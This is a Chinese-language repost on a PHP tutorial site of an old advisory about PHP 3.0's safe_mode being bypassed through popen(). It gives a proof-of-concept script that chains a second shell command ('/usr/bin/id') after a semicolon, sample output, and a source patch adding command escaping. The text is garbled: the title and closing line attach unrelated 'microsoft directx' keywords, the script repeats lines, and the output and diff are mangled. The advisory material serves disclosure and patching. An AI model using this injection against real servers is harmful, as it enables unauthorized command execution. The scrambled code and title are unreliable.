microsoft directx PHP3 safe_mode 失效漏洞

WBOY
發布: 2016-07-29 08:34:41
原創
969 人瀏覽過

受影響的系統:  PHP 3.00  
---------------------------------------- ------------------------------------------
說明:
    PHP Version 3.0是一個HTML嵌入式腳本語言。其大多數語法移植於C、Java和Perl並結合了
PHP的特性。這個語言可以讓web開發者快速創建動態網頁。
    因其執行在web伺服器上並允許使用者執行程式碼,PHP內建了稱為'safe_mode'的安全特性,
用於控制在允許PHP操作的webroot環境中執行指令。
    其實作機制是透過強制執行shell指令的系統呼叫將shell指令傳送到EscapeShellCmd()
函數,此函數用於確認在webroot目錄外部不能執行指令。
    在某些版本的PHP中,使用popen()指令時EscapeShellCmd()卻失效了,造成惡意使用者可
以利用'popen'系統呼叫進行非法操作。
----------------------------------------------- ---------------------------------
測試程式:
警告:以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。用戶風險自負!
<?php
$fp = popen("ls -l /opt/bin; /usr/bin/id", "r");
echo "$fp<br>n";
while($line = fgets($fp, 1024)):
printf("%s<br>n", $line);
endwhile;
pclose($fp);
endwhile;
pclose($fp);
phpinfo();
?>
輸出結果如下:
1
total 53  
-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls 30(wwwrun) gid=65534(nogroup) groups=65534(nogroup)  
and from the configuration values of phpinfo():
safe_mode 0 1 s
 
------------ -------------------------------------------------- ------------------
建議:  
Index: functions/file.c
============== ==================================================== ===
RCS file: /repository/php3/functions/file.c,v
retrieving revision 1.229
retrieving revision 1.230
diff -u -r1.229 -r1.230
--- functions/file.c 2000/01/01 04:31:15 1.229
+++ functions/file.c 2000/01/03 21:31:31 1.230
@@ -26,7 +26,7 @@
| Authors: Rasmus Lerdorf <rasmus@lerdorf.on.ca> |
+---------------------- ------------------------------------------------+
*/
-/* $Id: file.c,v 1.229 2000/01/01 04:31:15 sas Exp $ */
+/* $Id: file.c,v 1.230 2000 /01/03 21:31:31 kk Exp $ */
#include "php.h"
#include <stdio.h>
@@ -51,6 +51,7 @@
#include "safe_mode.h"
#include "php3_list.h"
#include "php3_string.h"
+#include "exec.h"
#include "fileh"
#if HAVE_PWD_H
#if MSVC5
@@ -575,7 +576,7 @@
pval *arg1, *arg2;
FILE *fp;
int id;
- char *p;
+ char *p, *tmp = NULL;
char *b, buf[1024];
TLS_VARS;
@@ -600,7 +601, 11 @@
} else {
snprintf(buf,sizeof(buf),"%s/%s",php3_ini.safe_mode_exec_dir,arg1->value.str.val);
}
}
- fp = popen(buf,p);
+
+ tmp = _php3_escapeshellcmd(buf);
+ fp = popen(tmp,p);
+ efree(tmp); /* temporary copy, no longer necessary */
+
if (!fp) {

php3_error(E_WARNING,"popen("%s","%s") - %s",buf,p,strerror (errno));

RETURN_FALSE;  

以上就介紹了microsoft directx PHP3 safe_mode 失效漏洞,包括了microsoft directx方面的內容,希望對PHP教程有興趣的朋友有所幫助。
相關標籤:
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板
關於我們 免責聲明 Sitemap
PHP中文網:公益線上PHP培訓,幫助PHP學習者快速成長!